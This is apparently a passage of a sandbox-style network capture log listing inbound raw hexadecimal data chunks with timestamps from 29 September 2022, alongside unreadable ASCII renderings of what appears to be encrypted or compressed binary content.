                                                                                                                                                2022-09-29 12:51:30 UTC8284INData Raw: 25 c3 22 1b 4d 0e 60 f1 b8 ab b2 da 8b bd c5 c6 f5 fa 5d 11 f5 8d 25 ba 5d 81 5e 75 0b b0 0a 8b ab e1 15 00 5c 71 a4 f0 3c 36 d7 fe 53 be 43 61 87 f6 4e 05 01 57 d7 df 34 0b 03 3f 9a c0 29 bc dc 38 2a d4 dd 8e 47 24 a4 15 48 b3 21 5c 38 55 0a 10 f6 da 4d 5c 1c 80 60 f5 65 ac a2 37 d0 a5 df 7b 6b 67 4d 3f 98 64 ef ee e7 70 be 46 b5 d4 a8 80 f8 ce ba d3 d3 8a d9 20 97 41 0f f1 db 1d 3f 24 4e 8b bb 6a c0 d9 56 cd 58 8f 29 49 db 78 4a 3b 22 84 41 9a 73 5b 30 7b b3 5b 5d 34 92 34 42 5b 55 74 6c 58 47 49 44 34 65 27 eb b1 00 d1 f8 14 69 9a 83 75 37 6a ee 98 4a ea b7 47 27 b6 e0 d7 40 22 64 be 11 d1 d7 2a 70 aa 67 f6 c0 00 ff 89 e3 94 95 41 87 a1 6d 04 49 c0 bf e6 06 0e f7 2f a0 c3 14 72 e4 6e 13 c0 91 70 f2 69 27 5a 4c 55 44 92 d9 2e 96 f0 57 25 ac 5f d4 30 5e
                                                                                                                                                Data Ascii: %"M`]%]^u\q<6SCaNW4?)8*G$H!\8UM\`e7{kgM?dpF A?$NjVX)IxJ;"As[0{[]44B[UtlXGID4e'iu7jJG'@"d*pgAmI/rnpi'ZLUD.W%_0^
                                                                                                                                                2022-09-29 12:51:30 UTC8300INData Raw: ba b5 85 b8 39 0a d6 d5 07 76 ce 9d d8 96 32 6b c6 6d ee c2 f3 4d c5 08 a5 0c 38 70 70 da 05 65 4f 24 0b 6b ae cf 30 fe a4 04 7c cf 1e a1 f7 e2 82 e5 55 72 4a 25 6a aa a2 c3 c5 75 fb f1 b8 0b 31 c3 39 e7 06 f0 8e 2c 02 cb 98 23 7c c0 af ca 43 8a db 8e d4 98 f7 a0 8a 3a 86 1d ba da 5d 7c d5 46 f9 e4 99 be 68 1b 5e 27 f6 ac a0 6a de f1 8a 6b 6d c3 f5 d5 85 a9 71 76 12 dc de dc 9b ee 97 1a ab 34 51 7d cb 31 90 37 73 02 7b 5c cf b8 90 f3 e1 c2 64 4e 29 15 21 16 6e 7d 36 10 88 30 4f 86 95 88 bf 07 65 2b ed db e4 f9 5a 60 d1 28 a7 ec c6 06 5b 41 cb ea 6e 05 0c c8 a6 ea b7 25 25 3c 58 11 15 c7 92 2c 37 66 d9 92 af 16 9e 2d 23 61 de 6b 39 d7 b4 81 d3 86 94 12 c9 93 72 df e0 c7 b5 72 18 e0 14 cc 42 81 83 9c 7c 33 45 a2 55 38 51 9a 78 24 e3 0f 83 de be c9 9e 44 8a
                                                                                                                                                Data Ascii: 9v2kmM8ppeO$k0|UrJ%ju19,#|C:]|Fh^'jkmqv4Q}17s{\dN)!n}60Oe+Z`([An%%<X,7f-#ak9rrB|3EU8Qx$D
                                                                                                                                                2022-09-29 12:51:30 UTC8316INData Raw: 74 c9 98 11 71 16 ac 91 c8 97 60 79 f6 46 10 15 39 b6 d6 b4 e3 64 90 9d ba 82 53 2d 07 c7 8b 69 f5 03 68 97 fd b3 7d 25 48 b7 df c8 e3 f4 2d 20 8c 24 12 c1 1a 9e f2 8a 5d a1 56 e4 5b 21 22 ce c9 cd 56 21 c7 25 6a 64 92 18 7f ef 16 ee 99 0d da e1 71 5b ca 0e 70 b9 07 86 2d 4e 3e 97 8c 35 d1 70 2b 12 13 cf 73 f8 27 f8 ec dd 9c 93 0c 27 68 69 71 58 1a 44 37 c9 50 4b 18 c9 73 96 23 3b 56 92 48 c0 3b 65 23 f0 27 b8 7c 34 1a 7e 0e 14 32 3f 99 87 1c ba 3a 36 ca 69 50 07 42 fd 71 f5 58 e0 22 35 01 5a 9d e7 6f e5 46 fc f2 b9 da c7 52 f0 1e a7 d5 ac 53 10 b8 ee 1c c0 b8 07 f8 51 43 06 1d ce 85 2d 01 c6 a0 3a ce 05 cf 69 89 35 53 dc 3b 60 3e 34 4e 11 e8 82 5e e4 bb 0f 25 1c 11 3e 2a 8f bf b7 7e 21 8b 6d 64 90 7e 0a 2a 99 1c 34 7e 60 6b 11 4c df b8 3a 29 65 c7 10 aa
                                                                                                                                                Data Ascii: tq`yF9dS-ih}%H- $]V[!"V!%jdq[p-N>5p+s''hiqXD7PKs#;VH;e#'|4~2?:6iPBqX"5ZoFRSQC-:i5S;`>4N^%>*~!md~*4~`kL:)e
                                                                                                                                                2022-09-29 12:51:30 UTC8332INData Raw: 43 d6 bb 7b bb 8f 55 17 d8 c2 b7 ad 17 b9 31 06 59 ef ab 29 5d 7a c3 1c 0d 43 ba 78 61 b9 6e d5 b7 8a 73 8a 23 28 08 06 23 e3 94 e7 d3 8b b3 35 9c 69 f3 9d 8f 52 ab e3 27 99 02 23 68 2e f9 61 e7 06 59 99 dd 8f b9 5e dc c1 42 5d 3a 0c 23 df 30 e3 67 9c 12 2e 1d 50 1a 8d a1 b2 25 8e 23 79 77 2c 35 c8 f5 92 1a a3 09 f1 b8 d1 e5 3b f8 c4 9b de 28 0a 05 b0 fc 48 a0 6f 8a 53 10 7b 0b fe c6 cc b2 bf 57 c2 b2 d8 e0 f7 10 e7 c1 9e fa 5b 45 99 c2 19 53 86 e8 03 93 0f 48 9b 4e 68 10 a9 85 02 c5 62 1f 2e 2f 7d 6c 27 6a 03 76 69 20 41 e4 a0 47 5d 35 68 3a 8c 60 51 31 5d cc 3d 0e a9 9d a5 8c e5 1c 55 b7 8c e9 90 ae 46 80 45 11 a2 e7 1e 0e 9f dd 3f ef 4c f0 bb 1c 1c c0 1d 0b 95 8a 22 44 a0 fd c2 b7 b8 2a 83 1d aa 79 7d af d9 bb d4 d8 42 e4 d6 e8 50 84 b9 a9 ba 3b 1c 8d
                                                                                                                                                Data Ascii: C{U1Y)]zCxans#(#5iR'#h.aY^B]:#0g.P%#yw,5;(HoS{W[ESHNhb./}l'jvi AG]5h:`Q1]=UFE?L"D*y}BP;
                                                                                                                                                2022-09-29 12:51:30 UTC8348INData Raw: 63 12 18 f1 09 a2 37 1a d7 a9 75 67 3f 7d 63 42 cd 59 f3 7c 1f f0 cb a0 8e c7 c8 dc 83 3c 35 a4 32 58 58 9c 5c 85 f7 04 c1 f0 89 f6 5e 2a 5f 1a 5a fe ed be df 45 15 16 e9 05 76 9b 75 88 e5 22 86 73 51 56 98 df e5 d2 86 59 81 98 fe 03 12 0d 13 dc c0 58 67 bd f1 cb 91 cf 1f 5e 51 a1 39 81 a5 87 13 f0 a7 8e 53 0c 0c 84 db a2 c5 24 c4 13 e6 bf 4f 17 a6 c6 c4 dd d9 c4 93 09 a4 61 01 27 16 9f 0d d4 4e 45 7b 53 ec 06 b7 a2 51 2b ca 74 60 af 7e 31 c3 60 26 df 88 b9 6d 86 19 7e f4 05 cc 41 54 00 5c 19 11 27 5c 95 7b 3d 6b ef c7 2a fa 61 ab 05 7e 62 f5 33 41 49 f7 6d cb 01 a2 24 00 00 af 24 bf 0c 05 bd 25 ef 0b 89 e8 2a 4a 94 49 b1 52 d6 bf 5c e4 52 b2 49 20 9d eb c4 25 a2 79 80 a7 3a 9d 5f bb fe b3 2d 47 e4 3d 92 fc a5 f6 00 ea 9d 66 c9 6e 48 06 56 db 57 f3 a8 c6
                                                                                                                                                Data Ascii: c7ug?}cBY|<52XX\^*_ZEvu"sQVYXg^Q9S$Oa'NE{SQ+t`~1`&m~AT\'\{=k*a~b3AIm$$%*JIR\RI %y:_-G=fnHVW
                                                                                                                                                2022-09-29 12:51:30 UTC8364INData Raw: 0e 6a 69 5b fd 42 c8 b9 47 7f 78 10 1d 6e 91 69 4f 45 46 ad 5b c1 7c bf 69 8a 44 a5 b7 c4 13 43 d3 b9 2e 2c e9 80 e8 3c 15 9d 30 98 10 5a fb 18 1e a9 f9 42 fd d9 44 6a 59 d0 d2 ae 4c 3f ed e2 6e 4d 8e 7f c1 a7 0a a3 bd d7 2b 08 8e 38 23 33 86 65 4a 3d a6 b0 ab 49 dc 50 11 d9 e4 74 72 61 3e df e6 fc 94 c5 56 3f d3 d9 56 61 91 b9 3b 34 bf 45 5e 2c 7b 83 f4 0e 97 c2 9e 5e 9d ba 4d 36 bf 4d c9 9d 5f 95 7e 4d e6 43 81 8e 55 c0 6e dd 47 31 0b e0 bf 5d eb c7 17 8c 85 9c 8a a6 c6 96 6a 96 cc ac b3 7c 5b 59 ee 7d c3 4d 47 b3 a3 36 b9 e8 65 9c dd c1 ad 23 1b c0 1a fc ac fc 65 a7 30 c9 41 b2 43 10 01 9f 3c 55 80 7a 79 64 90 f5 d4 67 85 2f ae 90 d9 b9 d5 7a 04 53 1c a2 16 c6 ff 16 26 c8 ba ac d5 4b a1 fb 4e 3d b5 c6 42 86 56 51 0f 02 70 32 a7 ed ec f0 8b e9 c5 a0 06
                                                                                                                                                Data Ascii: ji[BGxniOEF[|iDC.,<0ZBDjYL?nM+8#3eJ=IPtra>V?Va;4E^,{^M6M_~MCUnG1]j|[Y}MG6e#e0AC<Uzydg/zS&KN=BVQp2
                                                                                                                                                2022-09-29 12:51:30 UTC8380INData Raw: 45 86 27 37 6b 6d 6f ba f6 8e 66 cb e4 5e b7 5a ef ca bf 9f d7 88 b6 96 7b b2 22 2d 49 76 62 1c b3 9f c6 b9 1b 3c 8e e1 9c 0a 01 08 49 c6 db 11 a1 58 4c 4e 31 96 1e c0 3d 2f 06 40 93 51 1a 4e 92 55 73 d7 9e a0 ab b6 e8 49 e0 a9 d6 98 46 b0 b4 b1 39 d9 de ec 25 f4 b3 8d e0 3e 25 03 54 4c 3b 1e ea 5a 4c 94 39 ad 1e b9 6e 64 3d ca ac b5 75 c6 49 02 7f af 65 a0 b8 72 b3 66 f4 15 df 94 67 ab f5 b8 1e 07 5f 78 c3 5b 5a 51 10 fb 84 d3 0e 84 2c bf 25 8f 3c 1e ea 82 20 d6 a6 d7 75 bc dd b1 a2 bc d0 e4 e6 cd 76 01 19 0d 8b 31 92 2a 65 20 55 34 42 fe 11 7e 26 ee db f8 e6 0e ed e0 1b d2 7e fa fb b5 2e 7d 77 6c e1 63 68 55 a5 d0 1e 57 dc 05 41 9c 3e 0a d3 d2 a4 0c 26 50 e5 e2 c7 16 74 36 c0 bd 6c d3 c0 90 a9 91 fa d2 78 83 80 59 3d 59 53 d3 a9 dc 0f 7c e1 02 1a 85 73
                                                                                                                                                Data Ascii: E'7kmof^Z{"-Ivb<IXLN1=/@QNUsIF9%>%TL;ZL9nd=uIerfg_x[ZQ,%< uv1*e U4B~&~.}wlchUWA>&Pt6lxY=YS|s
                                                                                                                                                2022-09-29 12:51:30 UTC8396INData Raw: 25 17 06 6c 8c ec b1 01 b8 91 87 6f 28 0e a1 62 41 82 a7 2f d3 ca 8b 97 32 4c ef 23 6d 20 f2 16 a0 3d ea 2e 4f 7c 94 9b 87 59 87 c3 26 5a 8e 47 9b 2c fa 50 2a 9f 60 01 43 96 a3 aa 4f 65 b4 2c bb 87 b1 f8 03 7d 1b 90 d2 9d 5f 1a 33 2a cb 1b eb 70 0e 8f 78 d5 bc 58 2d 5f 7d b0 a4 38 ab 6a 1d c3 fb 23 8b da ac cc 5d 23 ad 84 db 45 9d 41 50 ca 85 b6 a6 0f 0d 7c bf aa ed 90 e6 81 ed 2a ab 8a 04 11 97 35 81 a9 dc a3 44 e5 6c 1b 18 0b e3 7b 5f 6f 4c 93 4c 96 34 e1 1a fe 7b a4 67 73 af 9d c1 2b 4d b8 ec 42 b1 a3 e3 cd 42 83 1a 02 82 6e e5 04 bb 48 b8 41 3b 9b 5c ec 7c 5d 23 6a b7 a8 fe b6 58 51 70 12 7b de 63 cc 31 3e 35 92 99 c1 c3 2c ef f2 ab 2c 4f ec b6 6b 82 4f 88 6b 58 30 e8 5a d6 57 59 ba 4e cf 72 31 fc fe f3 d0 50 11 dc a2 81 d4 d8 22 e6 bd 2c 7b 59 85 5e
                                                                                                                                                Data Ascii: %lo(bA/2L#m =.O|Y&ZG,P*`COe,}_3*pxX-_}8j#]#EAP|*5Dl{_oLL4{gs+MBBnHA;\|]#jXQp{c1>5,,OkOkX0ZWYNr1P",{Y^
                                                                                                                                                2022-09-29 12:51:30 UTC8412INData Raw: e7 d1 80 19 6b dc cc dc 14 cf ec 77 0e e4 dc 10 a9 76 3c d9 bf 16 b4 20 a6 37 87 36 74 55 39 51 75 54 6e c1 b2 9e 6b c6 db 32 6b 4b e5 13 3b 35 3c 03 8d 6a fe 9f 3f 16 25 48 38 1e d4 35 c5 9b 68 82 1b eb 5f 05 75 71 47 3e 35 90 9c 1d dc a8 a7 0e 86 cf f1 2d 4f fe bc f1 51 cc d2 04 ee c5 ac dd 96 77 f0 27 d5 fc 05 f0 af 32 07 3e bc da 1b 81 68 ea 74 8e e3 e8 5e 18 bc 13 02 3e 81 b7 d1 17 09 df 76 2f a6 1b f8 46 a8 c2 ae 42 49 0d 69 14 ba 2d 66 0a 2a 30 03 8a a7 d8 b7 ea 9c 9d 8b b3 85 2f 29 0b db 45 b1 4a ca 8f 08 74 2c 3b d8 53 f6 e3 cb 5a cf 27 86 2e 7b ff f3 e6 1c fe 30 09 ee 0c 16 42 7c 6f 0c ab be f5 06 86 34 f9 19 16 9f b8 47 68 27 3c 73 9b 54 12 4e a4 26 d1 4d cc 94 b6 f4 c2 d4 77 fc 81 33 00 06 be 51 11 d4 a1 99 cb c8 a3 ea 96 c4 a0 4c d5 3a 55 6f
                                                                                                                                                Data Ascii: kwv< 76tU9QuTnk2kK;5<j?%H85h_uqG>5-OQw'2>ht^>v/FBIi-f*0/)EJt,;SZ'.{0B|o4Gh'<sTN&Mw3QL:Uo
                                                                                                                                                2022-09-29 12:51:30 UTC8422INData Raw: 74 1d d0 1a bb 11 3f 34 85 81 38 de 42 1c c9 ed d6 64 52 e4 65 89 f2 59 8b 6f 8e 5a 60 d6 98 03 fd 63 56 27 8d bb df 82 fb 4d 36 92 19 4e 74 cf 83 1d 19 70 f6 f2 c1 44 09 45 8b f0 5c 41 0c 0a e4 f2 aa 11 80 74 41 d2 8c ed 46 e2 fc 19 b4 0e d3 c8 20 c4 f6 9d a5 f2 52 fb bf 5b 67 09 8d d7 eb a7 a0 16 e5 40 eb d0 f1 c0 23 93 9a a0 86 60 c1 e5 03 e5 7a 00 db 13 a5 b6 ef 67 45 47 bb 5e e4 fe dc cc 08 2d 4d 04 d4 4b e4 f1 4b e2 0b a3 93 9d 1d cd 01 22 df 8e 1d c1 2d a0 dd 68 9b b1 ad e2 4a 8e c6 ea da 6f c4 dd 2c b1 cd 51 3f 71 7d bb 59 4b 95 01 5b 0d 47 50 65 57 fb a4 f3 ad 18 cb f4 b9 7f 2d ab 9e 8f 44 eb f8 39 0f 9c 1e a1 45 6d b3 1d a5 ad d5 b9 19 72 1f 53 18 f8 2c c6 fa 7c ce 2b 00 56 d5 a1 d1 5e 9f f7 ae ae 46 0c 10 bf d5 40 9f 9b 89 49 68 63 db 3c cd 6a
                                                                                                                                                Data Ascii: t?48BdReYoZ`cV'M6NtpDE\AtAF R[g@#`zgEG^-MKK"-hJo,Q?q}YK[GPeW-D9EmrS,|+V^F@Ihc<j
                                                                                                                                                2022-09-29 12:51:30 UTC8438INData Raw: cc ad b1 22 e4 01 63 c8 d2 f0 a5 61 de bf e3 07 d9 25 51 b6 24 42 f8 af 42 da 7b 91 4b 36 81 6e 58 ac 83 a4 b4 c2 49 cc bf 47 8d 58 99 84 d2 8c 28 97 db 8e 82 67 1b e8 e8 5e 76 fb 48 1d 38 bc db d8 b3 73 60 98 4f 8d e9 14 01 78 df 50 2a e8 98 f4 62 5a df 27 5d 04 ce e7 0f 7f b2 bf a0 12 8f 38 58 c9 74 77 b1 78 aa ee ea 48 ad 28 b3 49 e6 74 a4 22 4b bd 94 5f 06 6b b0 59 bb b6 7b 99 bd ab 13 68 16 7a 3b c9 ac fd 71 3f 60 12 74 d8 90 de 61 a1 5f 37 a3 15 f8 c2 3b 55 6a 62 26 09 bf 5d ae 62 b6 93 4c 18 99 8b 4c 18 f6 98 33 d1 2e 1f 4c e0 5d 10 2f 50 70 b9 15 5e 27 40 01 a4 42 61 c3 fc bd ae a2 14 c8 ff 79 c3 72 25 d5 37 1f 48 e2 52 51 69 7a 84 c5 64 14 b9 d6 24 b2 1b 81 fb 52 22 d8 b6 51 54 4d bf 85 34 f0 6b e8 69 1c 14 8d 0a 85 ee ca 9d 87 56 4b a5 d9 cf 94
                                                                                                                                                Data Ascii: "ca%Q$BB{K6nXIGX(g^vH8s`OxP*bZ']8XtwxH(It"K_kY{hz;q?`ta_7;Ujb&]bLL3.L]/Pp^'@Bayr%7HRQizd$R"QTM4kiVK
                                                                                                                                                2022-09-29 12:51:30 UTC8454INData Raw: 45 2e 7b 5f 15 39 2a e4 0a d0 8c 65 53 a5 25 41 e1 b5 f9 52 86 ef 3f 6a 2c 05 68 70 3b b5 7c 34 19 c5 b8 23 4b 06 d4 c6 a0 28 f1 85 0b a5 2f 4f fb 52 4b 1c 53 72 32 e1 5b 33 67 9f 1f e7 d7 d2 6f 4c 97 2e c9 bc 8c 33 0f 49 e8 2c 79 a9 d8 c3 3b 8d 92 4d 4c 0d 1c eb 8d 62 1d 8c e1 c3 31 b3 6d 1a 7a 3a 83 dc 3b 4b 62 59 0d 48 fe 0c 44 cd f2 26 ef 0c 0f a5 d0 bb 95 e1 59 bd b2 b1 c0 d6 97 40 cb 5f cc f1 0c 75 bc 01 0f 6a e0 6b 1f e4 65 eb e4 0a c9 d0 a6 22 57 3c b8 28 a8 24 ae f7 2e ae a0 d6 51 2a 52 8a f7 ba 4d 4c 6d 66 14 03 0b 04 81 34 60 1f 1c f5 02 dd 74 a5 15 48 78 83 90 10 d1 f3 15 04 c9 47 3e b5 e8 57 ff a9 35 2f 94 24 42 d3 b3 67 ff 4f d6 b4 ac f0 77 29 27 7f 83 1b df 2e fa 5f 9b a6 2c c2 cf 50 ff 11 b5 2c 0e 82 d7 e1 c0 dc bb d4 b7 b1 9a d5 c6 07 14
                                                                                                                                                Data Ascii: E.{_9*eS%AR?j,hp;|4#K(/ORKSr2[3goL.3I,y;MLb1mz:;KbYHD&Y@_ujke"W<($.Q*RMLmf4`tHxG>W5/$BgOw)'._,P,
                                                                                                                                                2022-09-29 12:51:30 UTC8470INData Raw: 49 3f 85 f6 b0 0a 61 66 f5 43 d5 2e d1 4e 78 7b 9a 20 d2 3e ea 85 e3 68 ce ca a0 66 28 d0 08 3e 4e 27 e2 ff 10 a1 6b 8c 2b 73 b6 8b 1a 81 23 cd 5f d5 df f8 f9 a3 a8 e2 c5 68 45 87 8b 23 fd 2c b7 9b 6a f0 2a 21 fc ae c4 de e9 f4 98 61 49 b1 3b df e4 6b 49 d7 72 80 0c a8 99 eb 35 ff 20 6d ff 11 f0 b3 62 3b f9 54 8d 28 55 3f aa bf b5 a1 f0 f7 2e 3f b8 a1 e5 1f 7a 45 55 eb 5a 36 57 32 94 5b e6 18 ec 4f 41 88 2a 71 73 61 d5 4c 43 bb 56 cb e2 0b e2 be 9c f7 0e 13 29 f1 1a 1a 88 bf d8 6a 39 c1 d1 d8 4c d5 5e 36 a0 d1 22 c0 2d d2 90 89 0d 46 c2 f4 f9 ad 55 e7 4a 9a f5 99 a8 ba 83 59 79 c2 0f 9a c5 1c 4a ac 48 54 89 5d 1d 74 48 25 4f c3 9e af 38 38 dd 61 f5 f4 e9 b6 9d 00 78 1b 07 f5 8d 81 3f 52 a6 63 6d 5c 0b a5 49 64 25 f0 b9 7f 0c 3d 93 ac 7c 53 7a c1 14 c3 88
                                                                                                                                                Data Ascii: I?afC.Nx{ >hf(>N'k+s#_hE#,j*!aI;kIr5 mb;T(U?.?zEUZ6W2[OA*qsaLCV)j9L^6"-FUJYyJHT]tH%O88ax?Rcm\Id%=|Sz
                                                                                                                                                2022-09-29 12:51:30 UTC8486INData Raw: 64 29 79 96 e5 4a 31 32 6d 58 85 a8 a7 63 b3 cb e5 90 e1 9f 5b 6a 2c ce c2 ba 5a 2b 97 d5 62 e6 a3 6d 65 0c 4d b5 c2 81 e4 54 93 62 33 d4 85 e0 60 aa d4 2b 3a ae f8 6e 54 f6 40 16 c8 c8 a0 8d cc 71 d5 9d 53 0f 8d a2 7c b1 1d e1 e0 b6 15 8b 2f 4c 18 2e 1f 1d 45 9a d8 36 8f b9 7d 4d 72 97 8e 92 95 fa 6c 15 2c c6 ce cb c8 ef bb 2d 9a bf e8 9a 48 a2 39 17 6f c7 d8 90 00 19 50 99 cb 53 c5 ee 36 1a 73 d8 5c 8a 21 d9 4f bf 14 e1 01 51 a2 fe 07 14 7d 4a f7 12 27 4a e3 92 c3 56 06 25 e8 95 92 f0 e4 11 30 56 47 a5 01 c7 5e 3f c2 0e af 89 8a d2 8b e7 1b 1e 94 3e 11 a4 34 5b bb da f7 40 15 9e 14 2b f3 d7 22 52 94 99 ae 30 a4 b0 33 ff 37 0d 90 b7 8c dc 24 b9 c6 74 9f 83 27 c4 b0 eb 70 6e a0 af 69 fd a7 65 dc b8 08 b9 02 d8 eb fe c6 f1 f7 4e f6 3d 1f a7 63 40 ad 46 30
                                                                                                                                                Data Ascii: d)yJ12mXc[j,Z+bmeMTb3`+:nT@qS|/L.E6}Mrl,-H9oPS6s\!OQ}J'JV%0VG^?>4[@+"R037$t'pnieN=c@F0
                                                                                                                                                2022-09-29 12:51:30 UTC8502INData Raw: 96 99 01 ce ff ce d4 b0 a2 09 12 04 e9 68 e2 b1 3b 32 5d a2 04 f6 b6 d2 34 ee f2 0b 38 28 3b 0b 44 a7 3d de 33 61 fa b7 96 f6 5d 47 ff ea 53 e1 87 77 17 38 59 89 fe 7b 72 ff 07 97 b5 84 9c e8 df 9c b3 a6 97 56 57 e0 fd 23 6f 91 47 fe b1 ae be d2 98 36 f5 75 4d e5 45 ad 25 fd 87 7c b3 d5 79 4a a3 09 b8 c5 55 1a 0d b8 be 29 0c 7a 0d d9 6c 58 aa ed da 54 0f 38 f7 f7 ad c4 af 50 65 d3 57 a5 9f 1d 44 a4 11 1d 5c 37 a5 99 29 87 8e 02 78 f1 e6 eb 0c 3d 65 11 f9 68 b5 fb 89 dc 6e 8c c7 04 79 3c 5e 00 85 ad c3 ac 95 f0 0e 60 20 76 85 b5 1d bc 00 c1 05 0f 60 d4 82 be f4 cd fa f9 6a ad de 81 ec 5c 3e ad d9 e9 2b ef 20 79 8a 6d a1 97 05 ef 55 8a a7 d3 9f b8 3e f2 12 51 66 a6 91 65 26 64 4e b0 5e 25 cd 6d 53 5b 40 b1 f2 01 08 e4 85 c9 b8 21 c7 0c f0 2f 24 78 1e fb fb
                                                                                                                                                Data Ascii: h;2]48(;D=3a]GSw8Y{rVW#oG6uME%|yJU)zlXT8PeWD\7)x=ehny<^` v`j\>+ ymU>Qfe&dN^%mS[@!/$x
                                                                                                                                                2022-09-29 12:51:30 UTC8518INData Raw: fd e4 22 15 1e 0d 7d 99 52 3e 3b d9 92 33 2a 60 81 9e 61 1a 1f a6 27 c7 1f 15 50 ea e2 b7 ae 4a f5 c4 55 4b e1 1f 3f ac f4 c3 83 01 cf 70 4d c0 44 98 eb 7a a6 c2 92 34 93 a2 0f 48 02 41 c8 d7 b9 48 a5 79 88 07 f2 09 c1 05 c4 56 a7 70 2d 4e 9e 01 e6 3a 79 a0 ab ad a3 81 b8 56 84 34 65 6c 78 1f 76 36 5a 2c b5 6a 55 b1 3a d1 64 c1 73 e0 98 da f8 c4 26 d7 5b ee 89 e1 2f f5 b2 77 c4 2f b2 2a 3d a4 5f 99 03 c2 69 9e 95 f4 2c 84 57 3f f8 4f 5c 52 59 89 83 aa bb 26 9e d0 66 1d ae 86 c7 16 a5 28 74 90 a4 0e 39 18 58 cf 48 57 0d 02 3f 0f 5e a2 44 7c c5 06 3f f4 49 93 82 9a 95 47 f5 f0 f2 e4 fa 4f 28 b6 92 04 16 98 af ad 34 7e 9a c7 a2 e2 c0 44 21 fe e8 e6 01 8e e1 0c b7 9d 02 36 ab c5 e4 02 9e 86 16 00 25 40 e1 41 9f 38 20 8b 35 e2 32 fc bd 43 18 73 8e d4 f4 0d 95
                                                                                                                                                Data Ascii: "}R>;3*`a'PJUK?pMDz4HAHyVp-N:yV4elxv6Z,jU:ds&[/w/*=_i,W?O\RY&f(t9XHW?^D|?IGO(4~D!6%@A8 52Cs
                                                                                                                                                2022-09-29 12:51:30 UTC8534INData Raw: f0 79 fb fd d3 c1 ea c5 a8 3d e4 71 71 ca 89 24 53 5d ea e5 d9 ab 18 2d 3d c2 f3 55 66 18 82 12 cd 75 b1 b5 d9 c2 a3 d3 00 50 8c 31 b9 cc bd ec 4f f5 f5 13 e6 91 4e b7 41 bc 73 c7 9e 79 27 d3 89 29 d0 ba 59 47 f9 ff 53 64 ba 15 b1 cc 83 d5 ce 07 bf 29 eb 8f d4 24 c7 0d 2e cb df 53 93 51 b6 bb 02 b2 08 97 51 32 1f 09 9d 3f 50 13 2f 24 1b 58 e5 b9 d7 1b ae df 01 8e a2 d2 cb 2c 62 d8 3d 0f 6e f4 c9 d7 a3 cb 8d f3 43 40 72 67 d7 d3 7b a2 c1 0f d0 95 14 33 d7 f6 60 4c c1 44 72 f8 46 89 e9 3b a6 b7 60 e7 7d a2 d3 33 dd 41 6b ae 75 c4 00 53 a6 d7 ee 7e 41 82 cd ee f2 db ea 02 01 d1 b7 fc 09 7a 18 f8 fd 59 c8 e2 20 7f 5c fc 06 5a 88 8f b5 d2 1d ab 9c b3 4f 21 85 2d 4c 35 ec af 4c 81 8a 49 ac 17 ed 66 f6 52 e1 03 e2 31 bd f8 f7 d0 92 73 d1 81 b7 f3 50 74 64 15 ba
                                                                                                                                                Data Ascii: y=qq$S]-=UfuP1ONAsy')YGSd)$.SQQ2?P/$X,b=nC@rg{3`LDrF;`}3AkuS~AzY \ZO!-L5LIfR1sPtd
                                                                                                                                                2022-09-29 12:51:30 UTC8550INData Raw: 16 72 98 78 3a f1 f8 cf 43 58 be be 54 30 63 24 02 f1 ca c4 c9 b7 14 4b 40 5a 5e 30 92 5c 56 c0 de f0 11 ef 24 b1 ce 70 f0 d4 0f 94 8e ee 9d d7 9f d8 bc 26 7e 3b 01 4a 97 c4 53 f1 03 b6 e5 da 73 18 79 1a 2b 93 b9 88 96 d1 57 21 84 cc 94 ac 15 e7 82 34 8b 97 ed 2e d3 47 2b 7a 9f 2c 1a 19 4f 80 5e cf ac 13 69 8a d0 7c c4 44 0f 7b de de c3 d1 de d0 53 b2 04 bc e3 72 a5 6b fe ea cb 19 5e 5c 60 63 c5 a8 5b 00 30 7f f1 e1 27 66 96 8c 80 18 ad 1b b1 eb 54 13 9d b1 1d 98 fc 32 92 80 21 9e 97 6c 9b 56 15 55 1d b5 3d de 1d 16 73 ed 8f 04 19 61 c7 bc e9 12 d3 99 0c 8d a2 ce e8 a9 ff 5a a9 45 7e 42 d6 83 e9 f3 45 ca bb ac ef 41 24 f2 c2 36 55 cb 31 c2 dd 6c fe a0 51 88 57 d5 95 c2 d3 60 7a 36 69 94 2e d7 b0 b2 f6 00 5f 96 6a 9e c5 98 29 f1 e7 e8 3c d9 67 7e b1 51 95
                                                                                                                                                Data Ascii: rx:CXT0c$K@Z^0\V$p&~;JSsy+W!4.G+z,O^i|D{Srk^\`c[0'fT2!lVU=saZE~BEA$6U1lQW`z6i._j)<g~Q
                                                                                                                                                2022-09-29 12:51:30 UTC8566INData Raw: 83 16 32 a0 70 4a 9e bd 41 05 3a 8a d5 0d ca b9 e0 3a d6 05 6b 80 2f 91 73 af 41 da c0 ee 53 c2 aa 95 85 36 30 3f e3 e9 df 10 65 ab f5 e4 ba 9e 6e 02 db 14 5a 53 05 d8 6d 83 ee f5 4e ee ef 67 06 65 10 dd dd 89 0c 71 da 10 74 e6 d3 8d 62 68 3e ef 3d da 23 d7 78 87 8e 01 35 2b be ba af fc ed 6b e8 d1 17 63 89 83 50 a8 06 7e 7c 36 56 4c 33 7c 04 54 e9 9c 93 1c b9 20 6a bb 97 e0 f8 36 e2 7f e7 d4 b4 e7 77 0f 3a 68 4e 31 4e d0 ee 64 24 4c 34 6a 55 12 0d 1e 10 d9 36 91 e5 78 62 99 ff 5e fa 27 65 2a 48 51 9b e7 92 90 c0 ac 75 8c 2c 02 35 24 62 6c 14 ed dd 0a e4 84 ef ea a9 88 39 4b 17 35 49 7c f1 bd 3b 3e 92 59 ab d7 ef 3b 24 fc 99 e8 74 66 e3 55 ef 77 8f 57 40 02 f3 39 88 2e 27 42 ae 01 af 84 75 e3 e0 8d ba 5c 23 17 49 bc 04 10 45 55 1c 36 aa a2 42 5c 24 9e 6c
                                                                                                                                                Data Ascii: 2pJA::k/sAS60?enZSmNgeqtbh>=#x5+kcP~|6VL3|T j6w:hN1Nd$L4jU6xb^'e*HQu,5$bl9K5I|;>Y;$tfUwW@9.'Bu\#IEU6B\$l
